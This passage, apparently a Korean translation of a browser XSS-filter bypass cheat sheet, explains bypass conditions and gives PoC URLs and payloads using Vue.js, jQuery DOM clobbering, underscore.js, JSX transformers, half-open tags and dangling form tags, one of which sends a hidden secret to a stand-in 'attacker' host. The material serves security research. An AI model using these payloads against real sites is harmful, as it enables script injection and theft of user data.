width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#vuejs%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>Vue.js\uc758 \uc0ac\uc6a9<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 Vue.js \ud30c\uc77c\uc774 \uc874\uc7ac\ud558\uac70\ub098 CORS\uc5d0 \ub300\uc751\ud55c CDN\uc73c\ub85c\ubd80\ud130 Vue.js\ub97c \ub85c\ub4dc\ud558\ub294 \ud398\uc774\uc9c0\uac00 \uc874\uc7ac<\/li><li>\ud398\uc774\uc9c0 \ud639\uc740 \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0\uc11c \uc870\uc791\ub41c \ud0dc\uadf8\uac00 \ud15c\ud50c\ub9bf\uc744 \ud1b5\ud558\uc5ec \uc2e4\ud589\ub420 \uc218 \uc788\uc74c<\/li><\/ol>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=\/bypass\/vue.html%3E%3Cdiv%20id=app%3E%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=\/bypass\/vue.html%3E%3Cdiv%20id=app%3E{{constructor.constructor(%27alert(1)%27)()}}<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;link rel=import href=\/bypass\/vue.html&gt;&lt;div id=app&gt;{{constructor.constructor('alert(1)')()}}<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#jquery%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>jQuery\uc758 \uc0ac\uc6a9<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 jQuery \ud30c\uc77c\uc774 \uc874\uc7ac\ud558\uac70\ub098 CORS\uc5d0 \ub300\uc751\ud55c CDN\uc73c\ub85c\ubd80\ud130 jQuery\ub97c \ub85c\ub4dc\ud558\ub294 \ud398\uc774\uc9c0\uac00 \uc874\uc7ac<\/li><li>\ud398\uc774\uc9c0 \ud639\uc740 \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0\uc11c \uc870\uc791\ub41c form\ud0dc\uadf8\uac00 jQuery\uc758 \ud568\uc218\ub97c \ud1b5\ud558\uc5ec \uc2e4\ud589\ub420 \uc218 \uc788\uc74c<\/li><\/ol>\n\n\n\n<p>\ubcf4\ucda9:<\/p>\n\n\n\n<p>jQuery\uc758 \ud568\uc218\ub294after, before, prepend, append, html, replaceWith, wrap, wrapAll, insertBefore, insertAfter, prependTo, appendTo\ub4f1\uc774 \uc788\uc74c.<br>ownerDocument\ub77c\ub294 name\uc18d\uc131\uc744 \uac00\uc9c4 form\uc744 \uc0ac\uc6a9\ud574\uc11c <a href=\"https:\/\/developer.mozilla.org\/ko\/docs\/Web\/API\/Node\/ownerDocument\">Node.ownerDocument<\/a>\uc758 \ucc38\uc870\ub97c \uc18d\uc5ec<br>\uc2a4\ud06c\ub9bd\ud2b8\uac00 \uc2e4\ud589\ub418\uc9c0 \uc54a\ub294 \ud658\uacbd\uc5d0\uc11c \uc2a4\ud06c\ub9bd\ud2b8\ub97c \uc2e4\ud589\ud558\uac8c \ud560 \uc218 \uc788\uc74c(\uc774\ub7ec\ud55c \uae30\ubc95\uc744 <a href=\"https:\/\/www.slideshare.net\/x00mario\/in-the-dom-no-one-will-hear-you-scream\/21\">DOM Clobbering<\/a>\ub77c\uace0 \ubd80\ub984)<br>\ub610\ud55c, \uc2a4\ud06c\ub9bd\ud2b8\uc758 \uc2e4\ud589 \uc804\uc5d0 &lt;!-\u200b\u200b- \ub97c <a href=\"https:\/\/github.com\/jquery\/jquery\/blob\/a6b0705294d336ae2f63f7276de0da1195495363\/src\/manipulation.js#L206\">\uc81c\uac70\ud558\ub294 \uacfc\uc815<\/a>\uacfc, Auditor\uc5d0\uc11c\ub294 \uc8fc\uc11d\uc744 \ucc28\ub2e8\ud558\uc9c0 \uc54a\ub294 \uacfc\uc815\uc774 \ud569\uccd0\uc838 \uc6b0\ud68c\uac00 \uac00\ub2a5<\/p>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/sirdarckcat.github.io\/csp\/jquery.html\">https:\/\/sirdarckcat.github.io\/csp\/jquery.html<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?type=5&amp;q=%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!--alert(1)%3C\/script%3E%3C\/form%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?type=5&amp;q=%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!&#8211;alert(1)%3C\/script%3E%3C\/form%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n&lt;script src=\"\/js\/jquery-3.2.1.min.js\"&gt;&lt;\/script&gt;\n&lt;script&gt;\n$(document).ready(function(){\n    \/\/ code taken from http:\/\/api.jquery.com\/after\/\n    $( \".container\" ).after( $( \".child\" ) );\n});\n&lt;\/script&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n&lt;!-- XSS --&gt;\n&lt;form class=child&gt;&lt;input name=ownerDocument&gt;&lt;script&gt;&lt;!--alert(1)&lt;\/script&gt;&lt;\/form&gt;\n&lt;!-- XSS --&gt;\n&lt;p class=\"container\"&gt;&lt;\/p&gt;\n&lt;\/body&gt;\n&lt;!-- Inspired by @sirdarckcat CSP bypass trick: https:\/\/sirdarckcat.github.io\/csp\/jquery.html --&gt;\n&lt;\/html&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=\/bypass\/jquery.html%3E%3Cp%20class=container%3E%3C\/p%3E%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!--alert(1)%3C\/script%3E%3C\/form%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=\/bypass\/jquery.html%3E%3Cp%20class=<br>container%3E%3C\/p%3E%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E<br>%3C!-\u200b-alert(1)%3C\/script%3E%3C\/form%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;link rel=import href=\/bypass\/jquery.html&gt;&lt;p class=container&gt;&lt;\/p&gt;&lt;form class=child&gt;&lt;input name=ownerDocument&gt;&lt;script&gt;&lt;!--alert(1)&lt;\/script&gt;&lt;\/form&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#underscorejs%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>underscore.js\uc758 \uc0ac\uc6a9<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 underscore.js \ud30c\uc77c\uc774 \uc874\uc7ac\ud558\uac70\ub098 CORS\uc5d0 \ub300\uc751\ud55c CDN\uc73c\ub85c\ubd80\ud130 underscore.js\ub97c \ub85c\ub4dc\ud558\ub294 \ud398\uc774\uc9c0\uac00 \uc874\uc7ac<\/li><li>\ud398\uc774\uc9c0 \ud639\uc740 \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0\uc11c \uc870\uc791\ub41c script\ud0dc\uadf8\uac00 \ud15c\ud50c\ub9bf\uc744 \ud1b5\ud558\uc5ec \uc2e4\ud589\ub420 \uc218 \uc788\uc74c <\/li><\/ol>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=\/bypass\/underscore.html%3E%3Cscript%20id=template%3E\/\/%3C%alert%601%60%%3E%3C\/script%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=\/bypass\/underscore.html%3E%3Cscript%20id=template%3E\/\/%3C%alert`1`%%3E%3C\/script%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;link rel=import href=\/bypass\/underscore.html&gt;&lt;script id=template&gt;\/\/&lt;%alert`1`%&gt;&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#jsxtransformerbabel-standalone%E3%81%AA%E3%81%A9%E3%81%AEjsx%E5%A4%89%E6%8F%9B%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%88%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a><a href=\"https:\/\/github.com\/facebookarchive\/jstransform\">JSXTransformer<\/a>\/<a href=\"https:\/\/github.com\/babel\/babel-standalone\">babel-standalone<\/a>\ub4f1\uc758 JSX \ubcc0\ud658 \uc2a4\ud06c\ub9bd\ud2b8 \uc0ac\uc6a9<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 JSXTransformer.js \ub4f1\uc758 JSX \ubcc0\ud658 \uc2a4\ud06c\ub9bd\ud2b8 \ud30c\uc77c\uc774 \uc874\uc7ac\ud558\uac70\ub098 CORS\uc5d0 \ub300\uc751\ud55c CDN\uc73c\ub85c\ubd80\ud130 \ud574\ub2f9 \ud30c\uc77c\uc744 \ub85c\ub4dc\ud558\ub294 \ud398\uc774\uc9c0\uac00 \uc874\uc7ac<\/li><\/ol>\n\n\n\n<p>\ubcf4\ucda9:<\/p>\n\n\n\n<p>\ubcc0\ud658 \uc2a4\ud06c\ub9bd\ud2b8\uac00 SVG\uc758 \uc2a4\ud06c\ub9bd\ud2b8 \ube14\ub85d\uc744 HTML\uc758 \uc2a4\ud06c\ub9bd\ud2b8 \ube14\ub85d\uc73c\ub85c \ucef4\ud30c\uc77c\ud558\ub294 \uc810\uc744 \uc0ac\uc6a9\ud558\uc5ec \uc2e4\ud589\ud558\uc9c0 \uc54a\ub294 \uc8fc\uc11d \ubd80\ubd84\uc778 &lt;!-\u200b- -\u200b-&gt; \ubd80\ubd84\uc744 \uc2a4\ud06c\ub9bd\ud2b8\ub85c \uc778\uc2dd\ud568<\/p>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?charset=utf-8&amp;type=1&amp;q=%3Clink%20rel=import%20href=\/bypass\/babel-standalone.html%3E%3Csvg%3E%3Cscript%20type=%22text\/jsx%22%3E\/\/%3C!--%0aalert(1)\/\/--%3E%3C\/svg%3E%3Cscript%3E0%3C\/script%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?charset=utf-8&amp;type=1&amp;q=%3Clink%20rel=import%20href=\/bypass\/babel-<br>standalone.html%3E%3Csvg%3E%3Cscript%20type=%22text\/jsx%22%3E\/\/%3C!&#8211;%0aalert(1)\/\/&#8211;%3E%3C\/svg%3E%3Cscript%3E0%3C\/script%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;link rel=import href=\/bypass\/babel-standalone.html&gt;&lt;svg&gt;&lt;script type=text\/jsx&gt;\/\/&lt;!--\nalert(1)\/\/--&gt;&lt;\/svg&gt;&lt;script&gt;0&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#documentwrite%E6%99%82%E3%81%AB%E5%8D%8A%E7%AB%AF%E3%81%AA%E3%82%BF%E3%82%B0%E3%82%92%E5%88%A9%E7%94%A8%E3%81%99%E3%82%8Bchrome%E3%81%AE%E3%81%BF\"><\/a>document.write()\ub420 \ub54c \uc5b4\uc911\uac04\ud55c \ud0dc\uadf8\ub97c \uc0ac\uc6a9<\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>URL\uc744 document.write() \ud558\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac <\/li><li>\uacf5\uaca9\uc5d0 \uc0ac\uc6a9\ub418\ub294 \ud0dc\uadf8\uac00 document.write() \ub420 \ub54c \ub4a4\uc5d0 html \ud0dc\uadf8\uac00 \uc874\uc7ac\ud568 (PoC\uc5d0\uc11c\ub294 <code>&lt;\/body&gt;<\/code>\ub97c \ud65c\uc6a9)<\/li><\/ol>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=421786\">https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=421786<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)\/\/\">https:\/\/vulnerabledoma.in\/bypass\/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)\/\/<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;body&gt;\n&lt;script&gt;\nhash=location.hash.slice(1);\ndocument.write(decodeURIComponent(hash));\n&lt;\/script&gt;\n&lt;\/body&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>Chrome, Firefox, Edge, IE\uc5d0\uc11c\ub294 &gt; \ub85c \ud0dc\uadf8\ub97c \ub2eb\uc544\ub3c4 \uc815\uc0c1\uc801\uc73c\ub85c XSS \ud544\ud130 \uc6b0\ud68c\uac00 \uac00\ub2a5\ud568<\/p><p>\uc624\uc9c1 Opera\uc5d0\uc11c\ub9cc \uc5b4\uc911\uac04\ud55c \ud0dc\uadf8\ub97c \uc0ac\uc6a9\ud574 XSS \ud544\ud130\ub97c \uc6b0\ud68c\ud574\uc57c \ud568<\/p><\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>document.write() \ud568\uc218 \ub4a4\uc5d0 \ub2e4\ub978 \ud0dc\uadf8\uac00 \uc874\uc7ac\ud560 \uacbd\uc6b0\uc5d0 \uc5b4\uc911\uac04\ud55c \ud0dc\uadf8\uac00 \uc791\uc131\ub41c \ud6c4\uc5d0<\/p><p>\ub2e4\ub978 \ud0dc\uadf8\uc758 &gt; \uac00 \uc5b4\uc911\uac04\ud55c \ud0dc\uadf8\ub97c \ub2eb\ub294 \uc5ed\ud560\uc744 \ud574\uc90c. PoC\uc758 \uacbd\uc6b0\uc5d0 document.body.innerHTML \uac12\uc740<br>&lt;img src=&#8221;x&#8221; onerror=&#8221;alert(1)\/\/&#8221; &lt;=&#8221;&#8221; body=&#8221;&#8221;&gt; \uac00 \ub428<\/p><\/blockquote>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E5%8D%8A%E7%AB%AF%E3%81%AAform%E3%82%BF%E3%82%B0%E3%81%AE%E5%88%A9%E7%94%A8%E6%83%85%E5%A0%B1%E3%81%AE%E5%8F%96%E5%BE%97%E3%81%AE%E3%81%BFsafari%E3%81%AE%E3%81%BF\"><\/a>\uc5b4\uc911\uac04\ud55c form\ud0dc\uadf8\uc758 \uc0ac\uc6a9(\ubbfc\uac10 \uc815\ubcf4 \ucde8\ub4dd \uac00\ub2a5)<\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\uc0c8\ub85c form \ud0dc\uadf8\ub97c \uc368 \ubbfc\uac10 \uc815\ubcf4\ub97c \ud3ec\ud568\ud55c \uae30\uc874\uc758 form\ub0b4\uc6a9\uc758 action\uac12\uc744 \ubc14\uafd4\uce58\uae30 \ud560 \uc218 \uc788\uc74c<\/li><\/ol>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=719092\">https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=719092<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p>(form \ub0b4\ubd80\uc5d0 \uc874\uc7ac) <a href=\"https:\/\/vulnerabledoma.in\/bypass\/form?q=%22%3E%3C\/form%3E%3Cform%20action=https:\/\/attacker\/\">https:\/\/vulnerabledoma.in\/bypass\/form?q=%22%3E%3C\/form%3E%3Cform%20action=https:\/\/attacker\/<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;form action=\"form\"&gt;\n&lt;input type=\"hidden\" name=\"q\" value=\"\"&gt;&lt;\/form&gt;&lt;form action=https:\/\/attacker\/\"&gt;\n&lt;input type=\"hidden\" name=\"secret\" value=\"a09d3ef0\"&gt;\n&lt;input type=\"submit\"&gt;\n&lt;\/form&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>X<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>(form \uc678\ubd80\uc5d0 \uc874\uc7ac) <a href=\"https:\/\/vulnerabledoma.in\/bypass\/form2?q=%3Cbutton%20form=f%3ECLICK%3Cform%20id=f%20action=https:\/\/attacker\/\">https:\/\/vulnerabledoma.in\/bypass\/form2?q=%3Cbutton%20form=f%3ECLICK%3Cform%20id=f%20action=https:\/\/attacker\/<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;div&gt;&lt;button form=f&gt;CLICK&lt;form id=f action=https:\/\/attacker\/&lt;\/div&gt;\n&lt;form action=\"form2\"&gt;\n&lt;input type=\"hidden\" name=\"secret\" value=\"a09d3ef0\"&gt;\n&lt;\/form&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h1 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#ieedge%E3%81%AExss%E3%83%95%E3%82%A3%E3%83%AB%E3%82%BF%E3%83%BC\"><\/a>IE\/Edge\uc758 XSS \ud544\ud130<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E9%81%AE%E6%96%AD%E5%AF%BE%E8%B1%A1%E3%81%A7%E3%81%AA%E3%81%84%E3%82%82%E3%81%AE-1\"><\/a>\ucc28\ub2e8 \ub300\uc0c1\uc774 \uc544\ub2cc \uac83<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E6%96%87%E5%AD%97%E5%88%97%E3%83%AA%E3%83%86%E3%83%A9%E3%83%AB%E3%81%A7%E8%B5%B7%E3%81%93%E3%82%8Bxss-1\"><\/a>\ubb38\uc790\uc5f4 \ub9ac\ud130\ub7f4\uc5d0\uc11c \uc77c\uc5b4\ub098\ub294 